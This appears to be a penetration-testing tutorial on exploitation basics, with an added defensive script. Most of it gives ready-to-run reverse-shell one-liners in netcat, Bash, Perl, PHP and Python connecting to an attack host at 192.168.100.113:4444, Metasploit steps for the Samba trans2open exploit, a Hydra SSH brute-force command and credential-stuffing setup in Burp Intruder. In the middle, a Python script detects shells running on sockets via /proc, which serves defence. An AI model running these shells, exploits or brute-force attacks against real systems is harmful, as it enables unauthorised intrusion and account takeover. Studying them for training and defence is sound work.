Exploitation Basics
Reverse Shell vs Bind Shell
Probably the most common use of Netcat from a penetration-testing perspective is reverse shells and bind shells. A reverse shell is a shell initiated from the target host back to the attack box, which sits in a listening state to pick up the shell. A bind shell is set up on the target host: it binds to a specific port and listens for an incoming connection from the attack box. In malicious software a bind shell is often referred to as a backdoor.
GitHub examples of reverse shells.
Netcat reverse shell example
- Setup a Netcat listener.
- Connect to the Netcat listener from the target host.
- Issue commands on the target host from the attack box.
First we set up a Netcat listener on the attack box, listening on port 4444, with the following command:
nc -lvp 4444
Then we issue the following command on the target host to connect back to our attack box (remember we already have remote code execution on this box):
For Linux:
nc 192.168.100.113 4444 -e /bin/bash
For Windows:
nc.exe 192.168.100.113 4444 -e cmd.exe
On the attack box we now have a bash shell on the target host, and we have full control over this box in the context of the account that initiated the reverse shell.
Reverse shell without Netcat on the target host
One major downside of the example shown is that you need Netcat on the target host, which is very often not the case in real-world scenarios. In some cases Netcat is present, or we have a way to install it, but in many cases we need alternative ways to connect back to the attack box. Let's have a look at a few alternative ways to set up a reverse shell.
Bash reverse shell
We can also use Bash to initiate a reverse shell from the target host to the attack box with the following command (it relies on Bash's built-in /dev/tcp pseudo-device):
bash -i >& /dev/tcp/192.168.100.113/4444 0>&1
Perl reverse shell
If Perl is present on that remote host we can also initiate a reverse shell using Perl. Run the following command on the target host to setup the reverse shell:
perl -e 'use Socket;$i="192.168.100.113";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
PHP reverse shell
When PHP is present on the compromised host, which is often the case on webservers, it is a great alternative to Netcat, Perl and Bash. Let’s run the following code to use PHP for the reverse shell to the attack box:
php -r '$sock=fsockopen("192.168.100.113",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
Python reverse shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.100.113",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
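Whatever language the one-liner is written in, every variant above ends in the same state: an interactive shell whose stdin, stdout and stderr are a TCP socket rather than a terminal (a bind shell started with nc -e looks identical once a client has connected). That is a signal a defender can read straight out of /proc. The script below is an added example written for this page, not code from the original tutorial or from any tool it mentions; the shell-name list, the little-endian decoding of /proc/net/tcp addresses, and the sample fd map and /proc/net/tcp line (constructed so the peer is the tutorial's 192.168.100.113:4444) are all assumptions.

```python
import os
import re
from typing import Dict, List, Optional

# Constructed list of shells whose stdio should never be a socket; extend per site.
SHELL_NAMES = {"sh", "bash", "dash", "ash", "zsh"}
SOCKET_RE = re.compile(r"^socket:\[(\d+)\]$")
TCP_STATES = {"01": "ESTABLISHED", "0A": "LISTEN"}

# Constructed sample of what /proc/<pid>/fd and /proc/net/tcp show for a bash whose
# stdio is a socket connected to the tutorial's attack box 192.168.100.113:4444.
SAMPLE_FDS = {0: "socket:[12345]", 1: "socket:[12345]", 2: "socket:[12345]"}
SAMPLE_NET_TCP = (
    "  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode\n"
    "   0: 0A01A8C0:B2F4 7164A8C0:115C 01 00000000:00000000 00:00000000 00000000  1000        0 12345 1 0\n"
)


def classify(comm: str, fd_targets: Dict[int, str]) -> str:
    """'shell-on-socket' when fds 0, 1 and 2 of a shell are all sockets (what nc -e,
    >& /dev/tcp, perl open(">&S"), php "<&3 >&3 2>&3" and os.dup2 leave behind),
    'partial' when only some of them are, 'ok' otherwise."""
    if comm not in SHELL_NAMES:
        return "ok"
    on_socket = [bool(SOCKET_RE.match(fd_targets.get(fd, ""))) for fd in (0, 1, 2)]
    if all(on_socket):
        return "shell-on-socket"
    return "partial" if any(on_socket) else "ok"


def decode_addr(hexaddr: str) -> str:
    """'7164A8C0:115C' -> '192.168.100.113:4444'. The kernel prints the IPv4 address
    in host byte order, so this assumes a little-endian host."""
    ip_hex, port_hex = hexaddr.split(":")
    octets = [str(int(ip_hex[i:i + 2], 16)) for i in (6, 4, 2, 0)]
    return ".".join(octets) + ":" + str(int(port_hex, 16))


def parse_net_tcp(text: str) -> Dict[str, dict]:
    """Map socket inode -> {local, remote, state} from the text of /proc/net/tcp."""
    table = {}
    for line in text.splitlines()[1:]:  # first line is the column header
        fields = line.split()
        if len(fields) >= 10:
            table[fields[9]] = {"local": decode_addr(fields[1]),
                                "remote": decode_addr(fields[2]),
                                "state": TCP_STATES.get(fields[3], fields[3])}
    return table


def peer_of(fd_targets: Dict[int, str], tcp_table: Dict[str, dict]) -> Optional[dict]:
    """Resolve the socket behind fd 0 to its TCP endpoints (None if not a TCP socket)."""
    m = SOCKET_RE.match(fd_targets.get(0, ""))
    return tcp_table.get(m.group(1)) if m else None


def read_fds(pid: int) -> Dict[int, str]:
    """fd number -> readlink target for one process; unreadable entries are skipped."""
    fd_dir = f"/proc/{pid}/fd"
    result: Dict[int, str] = {}
    try:
        for name in os.listdir(fd_dir):
            try:
                result[int(name)] = os.readlink(os.path.join(fd_dir, name))
            except OSError:
                pass  # fd closed while we looked
    except OSError:
        pass  # not our process (no permission) or it already exited
    return result


def scan_proc() -> List[dict]:
    """Walk the live /proc (run as root to see every user's fds) and report shells on sockets."""
    if not os.path.isdir("/proc"):
        return []
    try:
        with open("/proc/net/tcp") as f:
            tcp_table = parse_net_tcp(f.read())
    except OSError:
        tcp_table = {}
    findings = []
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        pid = int(name)
        try:
            with open(f"/proc/{pid}/comm") as f:
                comm = f.read().strip()
        except OSError:
            continue
        fds = read_fds(pid)
        verdict = classify(comm, fds)
        if verdict != "ok":
            findings.append({"pid": pid, "comm": comm, "verdict": verdict,
                             "tcp": peer_of(fds, tcp_table)})
    return findings


def demo() -> dict:
    """Run the same logic over the constructed sample instead of the live /proc."""
    return {"verdict": classify("bash", SAMPLE_FDS),
            "tcp": peer_of(SAMPLE_FDS, parse_net_tcp(SAMPLE_NET_TCP))}


if __name__ == "__main__":
    print(demo())
    for hit in scan_proc():
        print(hit)
```

This is a point-in-time check; an EDR or auditd/eBPF rule would evaluate the same condition at the moment the shell is exec'd, which also catches the short-lived case. Legitimate daemons rarely run sh or bash with a socket on all three standard descriptors, so the rule is specific enough to page on, but the 'partial' verdict is worth reviewing by hand before alerting on it.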
Netcat Bind Shell
As we’ve mentioned earlier in this Hacking with Netcat tutorial a bind shell is a shell that binds to a specific port on the target host to listen for incoming connections. Let’s have a look at the visualization of a bind Netcat shell:
Netcat Bind shell example
Let’s see how this looks on the console:
Note
Reverse shell = the victim connects to us. Bind shell = we connect to the victim.
Staged vs Non-Staged Payloads
Important
Pay attention to the payload naming: meterpreter_reverse_tcp (one name joined with an underscore, delivered all in one piece) => non-staged. meterpreter/reverse_tcp (separated by a slash, a small stager that fetches the rest) => staged.
Gaining Root with Metasploit
searchsploit samba 2.2
Samba 2.2.8 (BSD x86) - 'trans2open' Remote Overflow (Metasploit) | bsd_x86/remote/16880.rb
Samba 2.2.8 (Linux Kernel 2.6 / Debian / Mandrake) - Share Privilege Escalation | linux/local/23674.txt
Samba 2.2.8 (Linux x86) - 'trans2open' Remote Overflow (Metasploit) | linux_x86/remote/16861.rb
Samba 2.2.8 (OSX/PPC) - 'trans2open' Remote Overflow (Metasploit) | osx_ppc/remote/16876.rb
Samba 2.2.8 (Solaris SPARC) - 'trans2open' Remote Overflow (Metasploit) | solaris_sparc/remote/16330.rb
Samba 2.2.8 - Brute Force Method Remote Command Execution
msfconsole
search trans2open
use 1
options
show targets
run (or exploit)
set payload linux/x86/
Manual Exploitation 80/443
80/443 - OpenLuck https://www.exploit-db.com/exploits/764
https://github.com/heltonWernik/OpenLuck
139 - Potentially vulnerable: https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/linux/samba/trans2open
https://www.exploit-db.com/exploits/7
https://www.exploit-db.com/exploits/10
SSH https://www.rapid7.com/db/modules/exploit/multi/ssh/sshexec/
Brute Force Attacks
/usr/share/wordlists/
hydra
syntax:
- -l (single username)
- -P (password list file)
hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh://192.168.57.4:22 -t 4 -V
- Metasploit alternative: search ssh_login
Credential Stuffing
Replaying username/password pairs from breached account dumps against another service, in the hope that the user reused the password, to achieve account takeover.
Burp Intruder: the Sniper attack type for password spraying (one payload list, e.g. usernames, against a fixed password), and Pitchfork for paired username and password lists (credential stuffing).